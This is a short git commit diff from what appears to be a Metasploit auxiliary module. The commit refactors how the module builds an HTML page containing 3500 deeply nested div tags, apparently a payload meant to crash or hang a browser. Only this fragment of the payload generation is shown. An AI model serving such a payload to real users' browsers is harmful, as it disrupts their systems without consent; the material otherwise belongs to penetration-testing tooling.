improve div tags

GSoC/Meterpreter_Web_Console
Tim W 2018-09-16 18:57:09 +08:00
parent 2eb97ea07b
commit 1d2519978d
1 changed files with 1 additions and 4 deletions

View File

@ -50,10 +50,7 @@ class MetasploitModule < Msf::Auxiliary
</style> </style>
</head> </head>
<body> <body>
| #{'<div>' * 3500 + '</div>' * 3500}
html += "<div>" * 3500
html += "</div>" * 3500
html += %|
</body> </body>
</html> </html>
| |